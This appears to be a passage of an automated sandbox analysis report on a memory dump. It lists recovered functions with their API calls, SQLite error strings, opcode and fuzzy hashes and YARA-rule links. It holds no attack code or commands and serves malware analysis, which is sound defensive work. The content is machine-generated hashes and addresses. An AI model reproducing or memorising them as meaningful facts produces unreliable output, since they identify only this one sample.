                                                                      • Part of subcall function 04266401: GetLastError.KERNEL32(00000000,?,04268196,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257,00000008), ref: 04266429
                                                                    • _free.LIBCMT ref: 042077B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharHeapMultiWide_free$AllocateErrorFreeLast_malloc
                                                                    • String ID:
                                                                    • API String ID: 70952271-0
                                                                    • Opcode ID: bd45dd2d16e15f5f819ec2d9778feef03de51a65cdbd5b2100e9cc1317d0f5ed
                                                                    • Instruction ID: 616a236e363c15310e9b3074e444d48b1a28e90ecdfbdd31046c797cc5449fa3
                                                                    • Opcode Fuzzy Hash: bd45dd2d16e15f5f819ec2d9778feef03de51a65cdbd5b2100e9cc1317d0f5ed
                                                                    • Instruction Fuzzy Hash: 9DF0827275512336F73036BA7C09F9B25888BC1AB8F290331FA11EA2C4F994B84641B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04210860, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 288COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: $ $Recovered %d frames from WAL file %s
                                                                    • API String ID: 2102423945-1630138656
                                                                    • Opcode ID: 739dc079bdf8eab4295d441fb580d100402f008329f847c3df68627c439e2a94
                                                                    • Instruction ID: 0fa0e7e995eea3ebbcf3a8fc86176da1e8d227fe04d1da5af4a3989803847033
                                                                    • Opcode Fuzzy Hash: 739dc079bdf8eab4295d441fb580d100402f008329f847c3df68627c439e2a94
                                                                    • Instruction Fuzzy Hash: 19B1A271A183019FD714CF64C880A1BBBE5AFD8304F04496EF995CB762E774EA85CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04207620, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,04209488), ref: 04207634
                                                                    • _malloc.LIBCMT ref: 0420763D
                                                                      • Part of subcall function 0426643B: __FF_MSGBANNER.LIBCMT ref: 04266454
                                                                      • Part of subcall function 0426643B: __NMSG_WRITE.LIBCMT ref: 0426645B
                                                                      • Part of subcall function 0426643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266480
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0420765E
                                                                    • _free.LIBCMT ref: 04207669
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeap_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 2079281532-0
                                                                    • Opcode ID: 7fa3b631a76da0808bc2d601d7d77840bb12cfdd1175775e2342a102085e97a1
                                                                    • Instruction ID: 7963b6a9bfa2ca57163a1a4a67e1b94d67203d47bae4dcaf9a0efd3cb5ca4269
                                                                    • Opcode Fuzzy Hash: 7fa3b631a76da0808bc2d601d7d77840bb12cfdd1175775e2342a102085e97a1
                                                                    • Instruction Fuzzy Hash: B0F0657178523132F630356A3C0AF675548CB82FB5F350231FA15BE2C0D9847C4240AE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 042075C0, Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,75145420,04209086,00000000,00000000,7519F560), ref: 042075D0
                                                                    • _malloc.LIBCMT ref: 042075DC
                                                                      • Part of subcall function 0426643B: __FF_MSGBANNER.LIBCMT ref: 04266454
                                                                      • Part of subcall function 0426643B: __NMSG_WRITE.LIBCMT ref: 0426645B
                                                                      • Part of subcall function 0426643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266480
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 042075F9
                                                                    • _free.LIBCMT ref: 04207604
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeap_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 2079281532-0
                                                                    • Opcode ID: f2d9222f5916be2275352d102bf1bf4441f919f807719612543e2b0fb8245955
                                                                    • Instruction ID: dcb4de8023edb814c42bca5d480c8000d8c80db4a7518ddb816bfdd8dd79e492
                                                                    • Opcode Fuzzy Hash: f2d9222f5916be2275352d102bf1bf4441f919f807719612543e2b0fb8245955
                                                                    • Instruction Fuzzy Hash: B7F0657274523232F731356A7C49F97655CDF81BB5F250332FA11AA1C0EA94BC4641E5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0421B410, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 0-1231421067
                                                                    • Opcode ID: 864ebf2f84eb3407de4d1218dd994cba330b17683663f7f8e1806d4d223fabd9
                                                                    • Instruction ID: ed91791223a61cfe9854af542cfa1d7b30d09466f4d28532fe2f38f0267baf2b
                                                                    • Opcode Fuzzy Hash: 864ebf2f84eb3407de4d1218dd994cba330b17683663f7f8e1806d4d223fabd9
                                                                    • Instruction Fuzzy Hash: C7A1F1727203029BD720DF28E880A6AB7F1EFA4764F054569E9498B361E771FC45CBD2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04218E10, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 286COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • database corruption at line %d of [%.10s], xrefs: 04219141
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 04219137
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 0-1231421067
                                                                    • Opcode ID: 83aaa01d472b15f165dea33fde62780ebd58625bfbc26840ed84beec2658c544
                                                                    • Instruction ID: d3da07f5e235dd32208b2ea10d3a5def3aa0124948d70cc35dd67d382db09138
                                                                    • Opcode Fuzzy Hash: 83aaa01d472b15f165dea33fde62780ebd58625bfbc26840ed84beec2658c544
                                                                    • Instruction Fuzzy Hash: CFA19BB17183028FD714DF29C890A6BB7E5BF98714F088A6DF88997361D731E944CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0420D9B0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 264COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0420D9E7
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0420DB3F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_memset
                                                                    • String ID: }
                                                                    • API String ID: 121741435-4239843852
                                                                    • Opcode ID: b5328e169eaa463028e2bc9bd4ccfef383659babad59f0e911694d04efe0e922
                                                                    • Instruction ID: 81d84b3b339206215b3524142db36a0a32f93cd96363adb7185f34884cc37222
                                                                    • Opcode Fuzzy Hash: b5328e169eaa463028e2bc9bd4ccfef383659babad59f0e911694d04efe0e922
                                                                    • Instruction Fuzzy Hash: 1CA13AB4B212069FDB14CF95C480AAEB7F5FF88314F24C569E949AB382D771B941CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 042158C0, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 224COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    • Opcode ID: e356a5616cb61c0e9d25b62dda3aa5dea37e19a50f90a52e36a2fd6823eda279
                                                                    • Instruction ID: 06d32eba83fad2b0967f90fac2603550cad9db17cd8ebbf8fd307ef642e7f34c
                                                                    • Opcode Fuzzy Hash: e356a5616cb61c0e9d25b62dda3aa5dea37e19a50f90a52e36a2fd6823eda279
                                                                    • Instruction Fuzzy Hash: 7C71EF71760312ABD720DE28C880A6677E5AFD4764F0845A9FD988B351D774FD80CBD1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0420C4D0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: 0
                                                                    • API String ID: 2102423945-4108050209
                                                                    • Opcode ID: 8489aff3e0f0a9a147ac508f6ff418d2e683398391df66272b76b7abfa3e2068
                                                                    • Instruction ID: 372cbc1eb3cadf5af7201e99cac898d660f7ae8e901e0bd0f4b6aed3c356910b
                                                                    • Opcode Fuzzy Hash: 8489aff3e0f0a9a147ac508f6ff418d2e683398391df66272b76b7abfa3e2068
                                                                    • Instruction Fuzzy Hash: BD5164B17243028BD728DE2AD88462AB7E5EF84354F14C93DE896D7282E774F905CB52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 042165F0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 173COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • database corruption at line %d of [%.10s], xrefs: 042166C4
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 042166BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    • Opcode ID: 20e4990389859475a0bdc24c5b12c31fc286be53b08e948f3e616774ca325423
                                                                    • Instruction ID: 49967a35aa4e62aefbe31d5ee8d334d335fa546ff235e5104430845254428043
                                                                    • Opcode Fuzzy Hash: 20e4990389859475a0bdc24c5b12c31fc286be53b08e948f3e616774ca325423
                                                                    • Instruction Fuzzy Hash: 7351E171B243528BD720DF28C44471AB7E1EF90718F1888A9EC589B362D7B5F846CBD1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 042136E0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    • Opcode ID: 0bb42dd8a8c1f2bbce72d6704ebf4896682cbeed07cb8ce15fb08580fca12f43
                                                                    • Instruction ID: 195db7517882545b765cd7d1fc57c32f4c79dbd8cbbb3a256aebd5266b17401c
                                                                    • Opcode Fuzzy Hash: 0bb42dd8a8c1f2bbce72d6704ebf4896682cbeed07cb8ce15fb08580fca12f43
                                                                    • Instruction Fuzzy Hash: BB51F3B0F142159BE704CF98CC81ABEBBF1EF44314F1441ADE819AB381D775AA508BA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0420F620, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • database corruption at line %d of [%.10s], xrefs: 0420F699
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 0420F68F
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    • Opcode ID: 9accb3df23bcc0bd69462fa5f285a1e1cc50445ccb3bb1ccec4ec60a6cbe38ec
                                                                    • Instruction ID: 86924ecbb582e6a6e2369ad3cb52d0647329f86b496366fdc5fbf83613abac9b
                                                                    • Opcode Fuzzy Hash: 9accb3df23bcc0bd69462fa5f285a1e1cc50445ccb3bb1ccec4ec60a6cbe38ec
                                                                    • Instruction Fuzzy Hash: 424126317643418BD7318F2889807163BE2AF85318F25C4ADE8988F3D3D6B5E946CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0420EEC0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 0-1231421067
                                                                    • Opcode ID: 23881fbc7bee48d8d267053dc48153126414443256a8efee09c22c64ab6dfaff
                                                                    • Instruction ID: 78b15fc4dc3b02456a13d47fb87a860349d221b68cf1e3cb256d83f4dc160f8b
                                                                    • Opcode Fuzzy Hash: 23881fbc7bee48d8d267053dc48153126414443256a8efee09c22c64ab6dfaff
                                                                    • Instruction Fuzzy Hash: D841C5717203019BE720DF24D945B26B3E5AF84728F15C958F9598B2C2EBF2F881CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0421D450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: out of memory$unknown database %s
                                                                    • API String ID: 2102423945-3235021497
                                                                    • Opcode ID: ffd72ef73aaa06db7b8cd65f030ca5b47e931f592251fc9ce6a7de1f42aeecd9
                                                                    • Instruction ID: 8855700167181f7aa464de6ebff3bd09f1026b955df952c14aeb7e3b61928311
                                                                    • Opcode Fuzzy Hash: ffd72ef73aaa06db7b8cd65f030ca5b47e931f592251fc9ce6a7de1f42aeecd9
                                                                    • Instruction Fuzzy Hash: 0621F97672021867E700AA6DEC8196BB7E8DB9822DF048165FD0CCB343E966FD1186D1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04210760, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • database corruption at line %d of [%.10s], xrefs: 04210838
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 0421082E
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    • Opcode ID: 3e7e5949a4772dceacaac3f26820f0c4e1e56d02053c39b4f5425235e9356260
                                                                    • Instruction ID: f90aab0919c365c16742e952643776f243c9e473e1f5cd5c0176c8972ee73539
                                                                    • Opcode Fuzzy Hash: 3e7e5949a4772dceacaac3f26820f0c4e1e56d02053c39b4f5425235e9356260
                                                                    • Instruction Fuzzy Hash: 9721F972F202069BEB209E6CD8416A9B7E5DF90314F158179E9449B790E775FA828780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%